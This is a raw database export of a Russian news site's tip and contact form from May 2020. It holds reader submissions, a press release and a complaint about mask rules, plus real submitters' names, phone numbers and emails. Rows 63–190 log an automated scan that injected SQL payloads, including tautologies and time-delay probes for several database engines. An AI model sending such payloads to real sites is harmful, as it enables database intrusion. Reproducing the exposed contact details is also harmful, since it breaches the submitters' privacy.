55,василий,+79185562171,shutov.vassily@yandex.ru,о франшизе,у нас есть своя радиостанция 101.9 fm радио ТВС таганрогска вещательная станция 20 лет на рынке СМИ. Прошу сбросить условия франшизы,"","2020-05-19 11:49:11",0,"4da6ad15ef3ce4663cc4942adc1971a5",1571971834
56,Сергей, ,serg.kzn@mail.ru,Слабо вам новость выложить?,https://www.youtube.com/watch?v=7YAPoI1IIPM,"","2020-05-20 17:34:45",0,"9bbb3e50531c6e432a68238e04227d58",3648413011
57,Сергей, ,serg.kzn@mail.ru,Слабо вам новость выложить?,https://www.youtube.com/watch?v=7YAPoI1IIPM,"","2020-05-20 17:34:46",0,"9bbb3e50531c6e432a68238e04227d58",3648413011
58,"","","",новому ковчегу не быть!," Очень много хотелось бы добавить, только все и так, что сценарий - он и есть сценарий. Ньюансы будут, возможно, видны попозже, В целом - хорошо, От себя могу только сказать, что еще лет пять назад нельзя было требовать чего-то большего, чем он - Путин мог сделать. Об этом много чего могу сказать и лично, но попозже. Потому что время работает на нас - и время у нас есть. Делай что должно, а получится...","","2020-05-21 02:39:23",0,c56a4b076894a8eb4962656275f27a2c,3158450432
59,Екатерина Матвеева,+7 960 048-74-65,"",Очень важно озвучить и такое мнение. Прошу свободы слова и готова дать интервью,"Мы вас всегда репостим, просьба и нас поддержать статьёй. https://vk.com/poboru?w=wall-38874620_466746","","2020-05-21 11:37:36",0,ec2699be1dd36d45e9511d4e379f9033,3000366084
60,Рустем,"89272412682","",Фейковое заключение по МСЗ,https://m.vk.com/@netmszkzn-zakluchenie-feik,"","2020-05-22 07:25:01",0,"7ac27e94d30fd7b9f45d44a680954c61",1533765097
61,Дарина,"89172499948",darina.brendiureva@domru.ru,Реальный виртуальный офис от «Дом.ru Бизнес»,"АО «ЭР-Телеком Холдинг» (ТМ «Дом.ru Бизнес») разработало для бизнес-клиентов сервис «Виртуальный офис под ключ». Он реализуется в рамках специальной программы антикризисных предложений #сохранитьбизнес.
Корпоративным клиентам компании предлагается комплекс услуг, включающий создание универсальных рабочих мест, подключение телекоммуникационных услуг, предоставление оборудования и настройку сетевых подключений с учетом требований информационной безопасности.
Проект «Виртуальный офис под ключ» призван сократить административные расходы клиентов «Дом.ru Бизнес» более чем на 45% в случае перевода части сотрудников на постоянную схему удаленной работы. 
Операционной эффективности способствует отсутствие у бизнеса сопутствующих капитальных затрат и расходов на содержание собственной инфраструктуры. Расходы на организацию виртуального офиса зависят от масштабов бизнеса.
«Дом.ru Бизнес» готов обеспечить масштабирование виртуальной инфраструктуры в кратчайшие сроки.
Также в рамках сервиса «Виртуальный офис под ключ» клиентам предлагаются дополнительные опции - подключение системы отслеживания утечек информации, шифрование каналов связи (сертифицированные алгоритмы шифрования ГОСТ VPN), комплексная защита компьютеров сотрудников от вредоносного ПО, аренда лицензий MS Office, 1C, IT- аутсорсинг (настройка приложений, ОС) внутри ОС клиента, а также аренда ресурсов GPU.
«Сейчас нужны не просто надежные интернет-провайдеры, а компании, которые помогают своим клиентам адаптироваться к новым условиям, а иногда даже и сохранить бизнес. Мы хотим быть такой компанией. Мы разработали специальную программу #сохранитьбизнес, одно из предложений которой - организация виртуальных офисов. С таким же качеством сервисов, удобством и безопасностью инфраструктуры как у привычных реальных офисов», - отметила Елена Мандрикова, директор по В2В АО «ЭР-Телеком Холдинг» (ТМ «Дом.ru Бизнес»).
","913ac0810814d0ebdab1eaa160c3809d","2020-05-22 09:57:09",0,"913ac0810814d0ebdab1eaa160c3809d",1841470217
62,ГОРОЖАНИН,"","","В Татарстане за соблюдение рекомендаций ВОЗ, Роспотребнадзора и МЧС могут оштрафовать","10 мая 2020 года Кабинетом Министров Республики Татарстан было подписано постановление №374, в п. 8 которого было запрещено нахождение граждан в общественных местах без использования средств индивидуальной защиты органов дыхания (маски, респираторы)
https://pravo.tatarstan.ru/rus/npa_kabmin/post/?npa_id=570591
В Российском законодательстве нет четкого описания термина «общественное место», оно трактуется достаточно широко, поэтому пресс-служба Прокуратуры РТ разъяснила, что:
«Согласно федеральному законодательству под общественным местом понимаются любые места, свободные для периодического либо постоянного доступа и использования неопределенным кругом лиц, в том числе места проведения массовых мероприятий, обслуживания и отдыха людей».
По данным прокуратуры РТ, к общественным местам можно отнести площади, проезды, бульвары, улицы, стадионы, скверы, парки, общественный транспорт. Также маски необходимо носить на вокзалах, в аэропортах, на лестничных площадках, автодорогах, ларьках, торговых рынках, палатках, магазинах, павильонах бытового обслуживания и общественного питания. Под эту категорию также попадают лифты и прочие находящиеся в совместном пользовании жильцов места в многоквартирных домах, территории АЗС и их помещения и так далее.
«Невыполнение данных правил влечет ответственность по статье 20.6.1 КоАП РФ. В частности, для граждан, нарушивших ограничительные меры, предусмотрено наказание в виде предупреждения либо штрафа в размере от 1 тыс. до 30 тыс. рублей».
Источник:  https://rt.rbc.ru/tatarstan/13/05/2020/5ebc05b29a79470ebac7d7a9
Как мы уже успели убедиться, именно штрафы и налоги с граждан у нас являются главной противоэпидемиологической мерой, достаточно вспомнить тот факт, что первым делом в России для борьбы с короновирусом был введен налог на вклады граждан.
На улицы незамедлительно вышла Татарстанская полиция, и начала штрафовать горожан. При этом в сети появились факты, когда сама татарстанская полиция требования по ношению средств защиты игнорирует.
Источники: https://www.business-gazeta.ru/news/468247 
 https://www.rbc.ru/rbcfreenews/5ec3b3059a7947041f3fe833
            Как уже неоднократно разъяснено специалистами, обычные маски довольно слабо выполняют функцию именно защиты, скорее они предотвращают распространение инфекции от больного другим людям, поскольку сдерживают распространение дыхательных аэрозолей с вирусом от больных к здоровым.   Таким образом, их действительно целесообразно носить всем в местах скопления людей.
            Однако далеко не всегда площади, проезды, бульвары, улицы, стадионы, скверы, парки бывают заполнены людьми, в условиях введенной самоизоляции эти объекты бывают малолюдны, в связи с чем становится непонятным целесообразность ношения масок там.
На этот счет есть следующие точки зрения компетентных органов:
На сайте Роспотребнадзора России
https://www.rospotrebnadzor.ru/about/info/news_time/news_details.php?ELEMENT_ID=13566

Медицинские маски для защиты органов дыхания используют: 

- при посещении мест массового скопления людей, поездках в общественном транспорте в период роста заболеваемости острыми респираторными вирусными инфекциями; 

- при уходе за больными острыми респираторными вирусными инфекциями; 

- при общении с лицами с признаками острой респираторной вирусной инфекции; 

- при рисках инфицирования другими инфекциями, передающимися воздушно-капельным путем. 

Требований носить на улице нет

На сайте МЧС РФ  по адресу https://www.mchs.gov.ru/deyatelnost/bezopasnost-grazhdan/profilaktika-koronavirusnoy-infekcii-6  размещена памятка по профилактике короновирусной  инфекции. Там, в частности, сказано:
«Маска уместна, если вы находитесь в месте массового скопления людей, в общественном транспорте, а также при уходе за больным, но она нецелесообразна на открытом воздухе. Во время пребывания на улице полезно дышать свежим воздухом и маску надевать не стоит».

Всемирная организация здравоохранения (ВОЗ) дает следующие советы:
В каких случаях следует носить маску:

Здоровым людям носить маску следует, только если они оказывают помощь человеку с подозрением на инфекцию 2019-nCoV.

Если вы кашляете или чихаете, носите маску.

Маски являются эффективным средством только в комбинации с регулярной обработкой рук спиртосодержащим антисептиком или водой с мылом.

https://www.who.int/ru/emergencies/diseases/novel-coronavirus-2019/advice-for-public/when-and-how-to-use-masks

Требований по ношению масок на улице там нет.

6.04.2020 на брифинге в Женеве генеральный директор Всемирной организации здравоохранения (ВОЗ) Тедрос Аданом Гебрейесус. По его мнению, массовое ношение медицинских масок — неправильное их использование, которое может нанести вред борьбе с пандемией. Он также сказал:

«Мы обеспокоены тем, что использование масок широкими слоями населения может усугубить их нехватку для людей, которые больше всего в них нуждаются».

Источник: https://lenta.ru/news/2020/04/06/masks_off/

Центры по королю и профилактике заболеваний США (CDC — федеральное агентство министерства здравоохранения США), рекомендует носить маски в общественных местах, где трудно поддерживать меры социального дистанцирования, в частности, в аптеках и продуктовых магазинах.
В США, кстати, закрывать лицо можно не только маской, но и шарфом.

Источник https://www.kommersant.ru/doc/4340304

10.04.2020 главный внештатный эпидемиолог и специалист по иммунопрофилактике министерства здравоохранения Татарстана, доцент кафедры эпидемиологии и дезинфектологии Казанской государственной медицинской академии (КГМА) Дмитрий Лопушов заявил следующее:
«Маску нужно носить только в местах массового скопления людей, когда реально есть риск заражения. Идти в маске в открытом пространстве, где поблизости нет людей, нет необходимости»

При этом он так же подчеркнул, что в ряде случаев маска наоборот, становится рассадником микроорганизмов.

 

Источник:  https://www.business-gazeta.ru/article/464582

 

Самый высокий уровень заболеваемости в России зафиксирован в Москве, но и там Мэр Москвы С.С. Собянин заявил в эфире телеканала ""Россия 1"" , что использование масок и перчаток на улице носит рекомендательный характер, он сказал:
- Ношение масок и перчаток на улице рекомендовано, но у нас действительно нет документов, обязывающих людей носить маски и перчатки на улице, но в помещениях, магазинах, общественном транспорте - обязательно носить.

 

Таким образом, на основании вышеизложенного, считаю, что меры по ношению масок, введенные вышеуказанным постановлением №374 от 10.05.2020 г. избыточно жестки в части того, что обязывают носить маску всегда на улице, а не только в местах реального скопления людей. Люди лишаются возможности дышать свежим воздухом, они дышат своими соплями из маски даже во время прогулок, что угрожает их здоровью. Это так же приводит к излишним затратам на покупку средств защиты. Напомню, что ранее постановления Татарстанского Кабмина также не предусматривали возможности людям легально выходить на улицу для прогулок, зато предусматривали неограниченно долго гулять  домашним животным в радиусе 100 метров от дома

 

Возникает интересная, но недопустимая ситуация, когда гражданин, следующий рекомендациям Роспотребнадзора, МЧС России, ВОЗ, квалифицированных специалистов, оказывается вне закона в Татарстане.","","2020-05-22 10:01:39",0,"0defacbcad28d1c1eac4941cb9ad84d5",1520073903
63,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:26:13",0,"1",1844061220
64,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:26:17",0,"1",1844061220
65,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:26:19",0,"1",1844061220
66,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:26:20",0,"1",1844061220
67,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:26:22",0,"1",1844061220
68,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:26:23",0,"1",1844061220
69,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:26:24",0,"1",1844061220
70,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:26:27",0,"1",1844061220
71,ghovjnjv,"555-666-0606","1'""",Mr.,"555","1","2020-05-22 12:26:29",0,"1",1844061220
72,ghovjnjv,"555-666-0606",\,Mr.,"555","1","2020-05-22 12:26:31",0,"1",1844061220
73,ghovjnjv,"555-666-0606",@@vBkHc,Mr.,"555","1","2020-05-22 12:26:34",0,"1",1844061220
74,ghovjnjv,"555-666-0606",JyI=,Mr.,"555","1","2020-05-22 12:26:35",0,"1",1844061220
75,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:26:42",0,"1",1844061220
76,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:26:43",0,"1",1844061220
77,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:26:44",0,"1",1844061220
78,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:26:44",0,"1",1844061220
79,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:26:45",0,"1",1844061220
80,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:26:46",0,"1",1844061220
81,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:26:47",0,"1",1844061220
82,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1'""","2020-05-22 12:26:48",0,"1",1844061220
83,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555",\,"2020-05-22 12:26:49",0,"1",1844061220
84,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555",@@m1vK0,"2020-05-22 12:26:51",0,"1",1844061220
85,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555",JyI=,"2020-05-22 12:26:53",0,"1",1844061220
86,"1'""","555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:26:57",0,"1",1844061220
87,\,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:26:58",0,"1",1844061220
88,@@egv5n,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:26:59",0,"1",1844061220
89,JyI=,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:27:00",0,"1",1844061220
90,ghovjnjv,"1'""",sample@email.tst,Mr.,"555","1","2020-05-22 12:27:04",0,"1",1844061220
91,ghovjnjv,\,sample@email.tst,Mr.,"555","1","2020-05-22 12:27:06",0,"1",1844061220
92,ghovjnjv,@@sz8Vl,sample@email.tst,Mr.,"555","1","2020-05-22 12:27:08",0,"1",1844061220
93,ghovjnjv,JyI=,sample@email.tst,Mr.,"555","1","2020-05-22 12:27:08",0,"1",1844061220
94,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:27:11",0,"1",1844061220
95,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:27:12",0,"1",1844061220
96,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:27:13",0,"1",1844061220
97,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:27:13",0,"1",1844061220
98,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:27:14",0,"1",1844061220
99,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:27:15",0,"1",1844061220
100,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:27:16",0,"1",1844061220
101,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"1'""","1","2020-05-22 12:27:17",0,"1",1844061220
102,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,\,"1","2020-05-22 12:27:17",0,"1",1844061220
103,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,@@GTBf8,"1","2020-05-22 12:27:19",0,"1",1844061220
104,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,JyI=,"1","2020-05-22 12:27:19",0,"1",1844061220
105,ghovjnjv,"555-666-0606",sample@email.tst,"1'""","555","1","2020-05-22 12:27:20",0,"1",1844061220
106,ghovjnjv,"555-666-0606",sample@email.tst,\,"555","1","2020-05-22 12:27:21",0,"1",1844061220
107,ghovjnjv,"555-666-0606",sample@email.tst,@@sNACw,"555","1","2020-05-22 12:27:22",0,"1",1844061220
108,ghovjnjv,"555-666-0606",sample@email.tst,JyI=,"555","1","2020-05-22 12:27:22",0,"1",1844061220
109,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:27:24",0,"1'""",1844061220
110,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:27:24",0,\,1844061220
111,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:27:25",0,@@pATjP,1844061220
112,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:27:25",0,JyI=,1844061220
113,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:27:47",0,"1",1844061220
114,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:27:53",0,"1",1844061220
115,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:27:54",0,"1",1844061220
116,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:27:54",0,"1",1844061220
117,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:27:54",0,"1",1844061220
118,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:27:55",0,"1",1844061220
119,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:27:55",0,"1",1844061220
120,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:27:55",0,"1",1844061220
121,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:28:01",0,"1",1844061220
122,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:28:07",0,"1",1844061220
123,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:28:14",0,"1",1844061220
124,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:28:20",0,"1",1844061220
125,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:28:27",0,"1",1844061220
126,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:28:33",0,"1",1844061220
127,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:28:39",0,"1",1844061220
128,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:28:44",0,"1",1844061220
129,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:28:51",0,"1",1844061220
130,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:28:58",0,"1",1844061220
131,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:29:03",0,"1",1844061220
132,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:29:09",0,"1",1844061220
133,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:29:15",0,"1",1844061220
134,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:29:20",0,"1",1844061220
135,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:29:25",0,"1",1844061220
136,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:29:30",0,"1",1844061220
137,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:29:35",0,"1",1844061220
138,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:29:41",0,"1",1844061220
139,ghovjnjv,"555-666-0606",-1 OR 2+289-289-1=0+0+0+1 -- ,Mr.,"555","1","2020-05-22 12:29:42",0,"1",1844061220
140,ghovjnjv,"555-666-0606",-1 OR 2+786-786-1=0+0+0+1,Mr.,"555","1","2020-05-22 12:29:42",0,"1",1844061220
141,ghovjnjv,"555-666-0606",-1' OR 2+794-794-1=0+0+0+1 -- ,Mr.,"555","1","2020-05-22 12:29:43",0,"1",1844061220
142,ghovjnjv,"555-666-0606",-1' OR 2+749-749-1=0+0+0+1 or 'QshYvuyd'=',Mr.,"555","1","2020-05-22 12:29:43",0,"1",1844061220
143,ghovjnjv,"555-666-0606","-1"" OR 2+125-125-1=0+0+0+1 -- ",Mr.,"555","1","2020-05-22 12:29:43",0,"1",1844061220
144,ghovjnjv,"555-666-0606","194'",Mr.,"555","1","2020-05-22 12:29:43",0,"1",1844061220
145,ghovjnjv,"555-666-0606","if(now()=sysdate(),sleep(12),0)",Mr.,"555","1","2020-05-22 12:29:47",0,"1",1844061220
146,ghovjnjv,"555-666-0606","0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z",Mr.,"555","1","2020-05-22 12:29:53",0,"1",1844061220
147,ghovjnjv,"555-666-0606","0""XOR(if(now()=sysdate(),sleep(12),0))XOR""Z",Mr.,"555","1","2020-05-22 12:29:59",0,"1",1844061220
148,ghovjnjv,"555-666-0606","(select(0)from(select(sleep(12)))v)/*'+(select(0)from(select(sleep(12)))v)+'""+(select(0)from(select(sleep(12)))v)+""*/",Mr.,"555","1","2020-05-22 12:30:09",0,"1",1844061220
149,ghovjnjv,"555-666-0606","1 waitfor delay '0:0:12' -- ",Mr.,"555","1","2020-05-22 12:30:16",0,"1",1844061220
150,ghovjnjv,"555-666-0606",pBV24Yro'; waitfor delay '0:0:12' -- ,Mr.,"555","1","2020-05-22 12:30:21",0,"1",1844061220
151,ghovjnjv,"555-666-0606",p8Eovp85' OR 253=(SELECT 253 FROM PG_SLEEP(12))--,Mr.,"555","1","2020-05-22 12:30:26",0,"1",1844061220
152,ghovjnjv,"555-666-0606",JAgeVWdr') OR 214=(SELECT 214 FROM PG_SLEEP(12))--,Mr.,"555","1","2020-05-22 12:30:31",0,"1",1844061220
153,ghovjnjv,"555-666-0606",VoqAFuFg')) OR 92=(SELECT 92 FROM PG_SLEEP(12))--,Mr.,"555","1","2020-05-22 12:30:37",0,"1",1844061220
154,ghovjnjv,"555-666-0606","sample@email.tst'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),12)||'",Mr.,"555","1","2020-05-22 12:30:42",0,"1",1844061220
155,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:30:52",0,"1",1844061220
156,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:30:53",0,"1",1844061220
157,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:30:53",0,"1",1844061220
158,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:30:59",0,"1",1844061220
159,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:31:04",0,"1",1844061220
160,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:31:09",0,"1",1844061220
161,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:31:16",0,"1",1844061220
162,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:31:21",0,"1",1844061220
163,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:31:28",0,"1",1844061220
164,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:31:36",0,"1",1844061220
165,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:31:41",0,"1",1844061220
166,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:31:48",0,"1",1844061220
167,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:31:54",0,"1",1844061220
168,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:32:00",0,"1",1844061220
169,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:32:09",0,"1",1844061220
170,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:32:17",0,"1",1844061220
171,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:32:23",0,"1",1844061220
172,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:32:31",0,"1",1844061220
173,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:32:38",0,"1",1844061220
174,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:32:46",0,"1",1844061220
175,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-05-22 12:32:52",0,"1",1844061220
176,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555",-1 OR 2+665-665-1=0+0+0+1 -- ,"2020-05-22 12:32:53",0,"1",1844061220
177,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555",-1 OR 2+433-433-1=0+0+0+1,"2020-05-22 12:32:53",0,"1",1844061220
178,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555",-1' OR 2+261-261-1=0+0+0+1 -- ,"2020-05-22 12:32:53",0,"1",1844061220
179,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555",-1' OR 2+669-669-1=0+0+0+1 or 'mCQUIEBs'=',"2020-05-22 12:32:54",0,"1",1844061220
180,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","-1"" OR 2+522-522-1=0+0+0+1 -- ","2020-05-22 12:32:54",0,"1",1844061220
181,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","535'","2020-05-22 12:32:54",0,"1",1844061220
182,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","if(now()=sysdate(),sleep(12),0)","2020-05-22 12:33:00",0,"1",1844061220
183,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z","2020-05-22 12:33:07",0,"1",1844061220
184,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","0""XOR(if(now()=sysdate(),sleep(12),0))XOR""Z","2020-05-22 12:33:14",0,"1",1844061220
185,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","(select(0)from(select(sleep(12)))v)/*'+(select(0)from(select(sleep(12)))v)+'""+(select(0)from(select(sleep(12)))v)+""*/","2020-05-22 12:33:20",0,"1",1844061220
186,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555",-1; waitfor delay '0:0:12' -- ,"2020-05-22 12:33:26",0,"1",1844061220
187,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555",-1); waitfor delay '0:0:12' -- ,"2020-05-22 12:33:31",0,"1",1844061220
188,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555","1 waitfor delay '0:0:12' -- ","2020-05-22 12:33:37",0,"1",1844061220
189,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555",PyTGHBmJ'; waitfor delay '0:0:12' -- ,"2020-05-22 12:33:45",0,"1",1844061220
190,ghovjnjv,"555-666-0606",sample@email.tst,Mr.,"555",-5 OR 172=(SELECT 172 FROM PG_SLEEP(12))--,"2020-05-22 12:33:55",0,"1",1844061220
191,"","","",В Казани по подозрению в мошенничестве задержали проректора КФУ,Inkazan,"","2020-05-22 16:10:11",0,f447dc97a1b9cb58c7766c0508a5519d,3000365069
192,Ильнур,"89600355596","","Борис Гребенщиков, Пахом и Вера Полозкова выступят в поддержку независимых книжных магазинов",Подробности о фестивале: https://vk.com/smena_book?w=wall-62944074_12642,"","2020-05-22 17:21:16",0,"57b02491882bf29e8ca682e71e3c43ac",3162680972
193,Альбина,"89033195882",kotlovskaya71@mail.ru,Беспредел Газпром Казань.,"У нас повторяется единичный случай как поселке Салмачи.из за отсутствия газапровода Минебаево Ижевск,который не зарегистрирован не в одном документе,наши дома попадаются мдр этого газапровода.Газпром Казань ни как не делает решать наши проблемы.очень просим Вас опубликовать на общ резонанс наш вопрос.у меня много материала на эту проблему.прошу вашей помощи.","","2020-05-22 21:10:37",0,"97f24f4042eca5c86f6b4a254bf64571",2956206152
194,"","","",Грант о борьбе с российской пропагандой в сфере здравоохранения ,https://www.grants.gov/view-opportunity.html,"","2020-05-23 10:01:24",0,b41fe21fe8b0a374bd3b767f8c28a72f,3116355340
195,"","","",Новый воппер,https://style.rbc.ru/repost/5ec7edf69a79475eb4526401?utm_source=application,"","2020-05-23 11:16:39",0,b41fe21fe8b0a374bd3b767f8c28a72f,3116355340
196,Маша,нет,"","",с сегоняшнего дня начиная 66!!!дней сиджу на карантине!! Все 66 днй у меня нет НИЧЕГО!!!Когда отпустят на волю?!,"","2020-05-24 16:55:33",0,"37e3a7749d0755e23318967772134914",1845243956
197,"","","","","Я понимаю что мое обращение Витя Вы не опубликуете. НО. Тем не менее. Хорош дурить НАРОД. Любая Трава ПОМОГАЕТ ЛЮБОМУ ОТ МЕСТА ЕГО ПРОЖИВАНИЯ. И. НЕ НАДО ВПАРИВАТЬ ЛЮДЯМ РАДИ СВОЕЙ НАЖИВЫ ТО ЧТО ИМ НЕ П О М О Ж Е Т                   Так что Народ. КОГДА ВЫ ПЕРЕСТАНЕТЕ ВЕРИТЬ ЭТИМ...... И ОТДАВАТЬ ИМ СВОИ КРОВНЫЕ ДЕНЬГИ???????????????????????????
 ","","2020-05-25 09:43:19",0,f6723d067a98044b44f9d40cb381c6e7,2966535362
198,Союз обманутых отправителей,"89033443078",lightspot98@gmail.com,Как Почта России подставила тысячи предпринимателей,"Организованный Почтой России с середины марта скрытый коллапс на фоне пандемии коронавируса подставил тысячи бизнесов нашей страны, работа которых построена на отправке посылок за рубеж. И пока, к сожалению, мало кто готов говорить об этом за пределами форумов и чатов, где собрались обманутые Почтой клиенты.
Начиная с марта 2020 года как минимум десятки тысяч (точной статистики у нас нет) международных посылок, бандеролей, мелких пакетов зависли после прохождения таможни в Шарапово (Москва) и других сортировочных пунктах, и лежат там неделями. Все это время Почта России продолжает принимать к пересылке международные отправления, не будучи способной обеспечить их доставку. А также с мая (самое время!) — поднимает тарифы на свои услуги на 11-13%.
Какого-либо официального заявления руководства Почты России относительно сложившегося коллапса не было, не считая нелепой «отписки» на сайте госорганизации о возможных замедлениях. В тексте, опубликованном на странице Почты России ВКонтакте 2 апреля, утверждается, что «почтовые самолеты продолжают доставлять отправления почти по всем направлениям». Собирается ли Почта принимать какие-либо меры, чтобы ликвидировать коллапс, не известно.
Мы же, владельцы магазинов на международных торговых площадках ETSY, Ebay и других, получаем жалобы от покупателей, не получивших свои заказы, и вынуждены возвращать деньги за уже отправленные посылки. Таким образом, мы теряем средства, потраченные на производство/материалы и на «доставку» товаров, не говоря уже о потерянном времени и физическом труде (многие из нас — мастера и ремесленники, создающие уникальные вещи своими руками). Большинство из нас работают в качестве самозанятых или как ИП и являются налогоплательщиками. Такие микробизнесы для нас не только хобби, но и возможность содержать свои семьи.
